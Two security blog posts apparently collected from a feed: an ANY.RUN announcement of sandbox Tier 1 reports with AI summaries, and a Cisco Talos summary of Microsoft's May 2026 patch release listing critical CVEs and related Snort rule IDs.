SOC-Ready Reporting Built Into the Analysis Workflow 

New Tier 1 reports are integrated into SOC workflows through and offer complete, structured documents with operationally useful insights. 

Tier 1 report includes:   

• A clear verdict on the analyzed sample   

• AI Summary featuring threat classification and executive summary 

• Key IOCs and behavioral indicators  

• MITRE ATT&CK mapping 

They can be generated directly within the Interactive Sandbox in a single click, making sandbox analysis immediately usable across operational workflows. 

Use Case #1: Fast Threat Understanding for Tier 1 During Triage 

Via Tier 1 reports featuring AI Summaries, ANY.RUN’s Interactive Sandbox provides immediate answers to the most critical questions that occur during alert triage: 

• Is the sample malicious? 

• What behavior indicates that? 

• What type of threat is involved? 

• What MITRE ATT&CK TTPs and IOCs are present? 

• Does the incident require escalation? 

Instead of manually reviewing raw technical data to answer these questions with confidence, the sandbox provides this context automatically in the form of a ready-to-use report that covers all findings into a clear operational document for fast and substantiated decision-making. 

Use Case #2: Easy Access to Context for Tier 2, Tier 3, IR teams  

In case of an escalation, Tier 2 analysts and incident responders frequently need to reconstruct investigation context manually before proceeding with containment. 

Raw sandbox outputs take time to process and interpret, stretching investigation time and creating friction, as higher tiers essentially have to go back to triage stage for verification. 

With Tier 1 reports, analysts get a structured information to pass on at the early stage, making ANY.RUN’s Interactive Sandbox more smoothly embedded into the entire investigation cycle, from triage to response. 

Use Case #3: Immediate Clarity for Decision-Makers 

SOC managers, Heads of SOC, and CISOs don’t have time to review every technical artifact associated with an incident. Traditional reports may contain too many low-level details, whereas security leaders must assess the general business impact and urgency of a threat. 

ANY.RUN’s Interactive Sandbox optimizes the hand-off workflow with a concise overview of the analysis in operational language suitable for leadership. 

With AI Summary as part of the structure, the report explains what happened, why the object is malicious, which assets or systems may be at risk.  

As a result, analysis outputs become standardized and practical, making them immediately usable for decision-making and internal communication. 

Hands-On Case: Generating a Response-Ready Report on a Phishing Attack 

View analysis 

In this phishing investigation, the Tier 1 report provides a clear, operational overview of the entire attack chain, helping both analysts and leadership quickly understand the threat severity and required response actions. 

AI Summary further structures the findings into operationally relevant context suitable for triage, escalation, and internal communication: 

The AI summary highlights the detection of a ClickFix phishing technique, followed by PowerShell execution with Execution Policy bypass attempts used to launch malicious activity on the host. It also outlines payload delivery behavior, subsequent system modifications, and persistence attempts through Windows Registry changes. 

Instead of manually reconstructing the attack flow from raw sandbox telemetry, analysts receive a ready-to-use interpretation of the incident that can immediately support escalation and response workflows. 

The complete attack chain, behavioral indicators, and resulting conclusions are already structured for operational use and are ready for further processing: escalation, IR hand-off, and containment. 

From Analysis to Action: Faster Escalations, Response, and Reporting 

The new Tier 1 reports featuring AI Summary deliver direct operational value across the SOC: 

• Faster Triage: Tier 1 analysts can quickly understand the nature of the threat and make confident decisions on whether to close or escalate alerts. 

• Streamlined Escalation Process: Tier 2 and IR teams receive well-structured context instead of raw data, reducing handoff time and miscommunication. 

• Accelerated Incident Response: Teams gain rapid visibility into attack behavior, helping reduce Mean Time to Respond (MTTR). 

• Improved Internal Reporting: SOC managers and CISOs get consistent, professional summaries that are easy to read and share with stakeholders. 

• More Consistent Performance: Standardized reports reduce quality variation between analysts and lower the risk of human error. 

Unlimited access is available for Enterprise Suite and Hunter plans. Free plan users have a shared limit of 5 generations for both the Tier 1 report and AI Summary. 

Conclusion 

ANY.RUN’s new Tier 1 reports and AI Summary convert sandbox analysis outputs into structured, operationally ready documents that support every stage of the incident lifecycle, from initial triage to executive visibility. 

Embedding Interactive Sandbox directly into a SOC workflow strengthens overall security operations maturity by allowing for faster and more confident decision-making across processes. 

About ANY.RUN 

ANY.RUN delivers cybersecurity solutions designed to support real-world SOC operations. They help security teams understand threats faster, make informed decisions, and operationalize threat intelligence across detection, investigation, and response workflows. 

The company’s solutions include Interactive Sandbox for enterprise-grade malware analysis, as well as ANY.RUN’s Threat Intelligence with its modules Threat Intelligence Lookup and Threat Intelligence Feeds, providing continuously updated intelligence based on live attack analysis. 

Used by over 15,000 organizations and 600,000 security professionals worldwide, ANY.RUN is SOC 2 Type II certified, ensuring strong security controls and protection of customer data. 

Request access to ANY.RUN’s solutions →  

FAQ 

The post New SOC-Ready Reporting for Faster Triage, Escalation, and Incident Response with ANY.RUN  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

By Jaeson Schultz 

Microsoft has released its monthly security update for May 2026, which includes 137 vulnerabilities affecting a range of products, including 31 that Microsoft marked as “critical”. 

In this month’s release, Microsoft has not observed any of the included vulnerabilities being actively exploited in the wild. Out of 31 “critical” entries, 16 are remote code execution (RCE) vulnerabilities in Microsoft Windows services and applications including Microsoft Office, Microsoft Word, Windows Native WiFi Miniport Driver, Azure, Office for Android, Microsoft Dynamics 365, Windows GDI, Microsoft SharePoint, Windows Graphics Component, Windows Netlogon, and Windows DNS Client. 

CVE-2026-32161 is a critical use after free vulnerability. Concurrent execution using a shared resource with improper synchronization (‘race condition’) in Windows Native WiFi Miniport Driver allows an unauthorized attacker to execute code over an adjacent network. 

CVE-2026-33109 is a critical access control vulnerability in Azure Managed Instance for Apache Cassandra. Improper access control allows an authorized attacker to execute code over a network.

CVE-2026-33844 is a critical input validation vulnerability in Azure Managed Instance for Apache Cassandra. Improper input validation allows an authorized attacker to execute code over a network.

CVE-2026-35421 is a critical heap-based buffer overflow vulnerability in Windows GDI that allows an unauthorized attacker to execute code locally. For this vulnerability to be exploited, a user would need to open or otherwise process a specially crafted Enhanced Metafile (EMF) file using Microsoft Paint. This action is necessary to trigger the affected graphics functionality in the Windows component. 

CVE-2026-40358 is a critical use after free vulnerability in Microsoft Office which allows an unauthorized attacker to execute code locally. 

CVE-2026-40361 is a critical use after free vulnerability in Microsoft Word that allows an unauthorized attacker to execute code locally. 

CVE-2026-40363 is a critical heap-based buffer overflow in Microsoft Office which allows an unauthorized attacker to execute code locally. 

CVE-2026-40364 is a critical heap-based buffer overflow vulnerability. Access of resource using incompatible type (‘type confusion’) in Microsoft Office Word allows an unauthorized attacker to execute code locally. 

CVE-2026-40365 is a critical vulnerability affecting Microsoft SharePoint. Insufficient granularity of access control allows an authorized attacker to execute code over a network. In a network-based attack, an authenticated attacker, as at least a Site Owner, could write arbitrary code to inject and execute code remotely on the SharePoint Server. 

CVE-2026-40366 is a critical use after free vulnerability in Microsoft Word which allows an unauthorized attacker to execute code locally. 

CVE-2026-40367 is a critical vulnerability affecting Microsoft Word. An untrusted pointer dereference may allow an unauthorized attacker to execute code locally. 

CVE-2026-40403 is a critical heap-based buffer overflow vulnerability in Windows Win32K – GRFX that allows an authorized attacker to execute code locally. This vulnerability could lead to a contained execution environment escape. In the case of a Remote Desktop connection, an attacker with control of a Remote Desktop Server could trigger a remote code execution (RCE) on the machine when a victim connects to the attacking server with a vulnerable Remote Desktop Client. 

CVE-2026-41089 is a critical stack-based buffer overflow in Windows Netlogon that allows an unauthorized attacker to execute code over a network. An attacker could send a specially crafted network request to a Windows server that is acting as a domain controller. If successful, this could cause the Netlogon service to improperly handle the request, potentially allowing the attacker to run code on the affected system without needing to sign in or have prior access. 

CVE-2026-41096 is a critical heap-based overflow vulnerability in Windows DNS Client. An attacker could exploit this vulnerability by sending a specially crafted DNS response to a vulnerable Windows system, causing the DNS Client to incorrectly process the response and corrupt memory. In certain configurations, this could allow the attacker to run code remotely on the affected system without authentication. 

CVE-2026-42831 is a critical heap-based buffer overflow vulnerability in Office for Android that allows an unauthorized attacker to execute code locally. An attacker must send a user a malicious Office file and convince them to open it. 

CVE-2026-42898 is a critical code injection vulnerability in Microsoft Dynamics 365 (on-premises). Improper control of generation of code (‘code injection’) allows an authorized attacker to execute code over a network. An attacker with the required permissions could modify the saved state of a process session in Dynamics CRM and trigger the system to process that data, which could result in the server unintentionally executing malicious code.

Talos would also like to highlight the following “important” vulnerabilities as Microsoft has determined that their exploitation is “more likely:”   

• CVE-2026-33835: Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability 
• CVE-2026-33837: Windows TCP/IP Local Elevation of Privilege Vulnerability 
• CVE-2026-33840: Win32k Elevation of Privilege Vulnerability 
• CVE-2026-33841: Windows Kernel Elevation of Privilege Vulnerability 
• CVE-2026-35416: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability 
• CVE-2026-35417: Windows Win32k Elevation of Privilege Vulnerability 
• CVE-2026-40369: Windows Kernel Elevation of Privilege Vulnerability 
• CVE-2026-40397: Windows Common Log File System Driver Elevation of Privilege Vulnerability 
• CVE-2026-40398: Windows Remote Desktop Services Elevation of Privilege Vulnerability 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.    

In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.    

Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are: 1:66438-1:66445, 1:66451-1:66460, and 1:66470-1:66476.  

The following Snort 3 rules are also available: 1:301494-1:301497, 1:301500-1:301506, 1:66472-1:66473, and 1:66476. 

Cisco Talos Blog – ​Read More